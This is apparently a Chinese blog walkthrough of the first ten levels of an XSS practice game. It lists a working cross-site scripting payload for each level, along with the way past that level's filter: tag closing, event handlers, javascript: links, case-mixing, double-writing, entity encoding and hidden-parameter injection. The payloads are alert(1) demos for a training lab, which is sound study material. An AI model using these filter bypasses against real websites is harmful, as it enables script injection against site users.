文章目录[隐藏]
查看源代码,发现有参数name,那么尝试最基本的攻击,通关成功。
<script>alert(1) </script>
利用第一关的代码,发现输入的值在input标签内,这时尝试闭合标签
"><script>alert(1)</script>
继续尝试利用第一关的代码,发现<>被过滤,此时尝试JavaScript鼠标事件。
' οnclick=alert(1)//
查看源代码,发现跟第三关及其相似,此时采用双引号闭合标签,插入JavaScript鼠标事件
" οnclick=alert(1)//
输入第一关代码,发现script被过滤成scr_ipt
按照第四关的方法时,发现onclick被过滤成o_nclick
此时,我们可以尝试使用a标签
"> <a href="javascript:alert ( 1 ) ">233</a>
利用第五关的方法,发现href被过滤成hr_ef,script跟on事件同第五关。
此时,我们尝试利用大小写绕过
"> <Script>alert(1)</script> //
根据前几关的方法尝试,发现都不可行,大小写也被过滤。且script,on,href被置空。
此时,我们尝试利用双写绕过。
"><sscriptcript>alert(1)</sscriptcript>
按套路,将前几关的代码都试了一遍,全部都不行,不是被过滤就是转义。
此时,我们可以尝试利用实体编码绕过
javascript:alert ( 1 )
跟第八关一样的套路,输入代码,提示链接不合法。
既然链接不合法,那我们就构造一个合法的链接
javascript:alert ( 1 ) //http:
直接查看源代码,发现有三个参数,尝试往URL里加参数
?keyword =hack&t_link = 1&t_history&t_sort = 3
发现只有t_sort被写入了, 所以注入点就是t_sort参数
这里提供两种方法,
一、向t_sort传入代码
keyword =test&t_sort = "type=" text " onclick = "alert ( 1 )
二、修改表单的工作方式,采用按钮提交,此方法可将代码永久注入到该页面
< form id = "search" action = "level10.php">
< input name = "t_link" value = "" type = "hidden">
< input name = "t_history" value = "" type = "hidden">
< input name = "t_sort" value = "" type = "text">
< input value = "提交" type = "submit">
< / form>
行云博客 - 免责申明 本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我联系处理。敬请谅解!
本文链接:https://www.xy586.top/4065.html
转载请注明文章来源:行云博客 » XSS游戏挑战详解(上)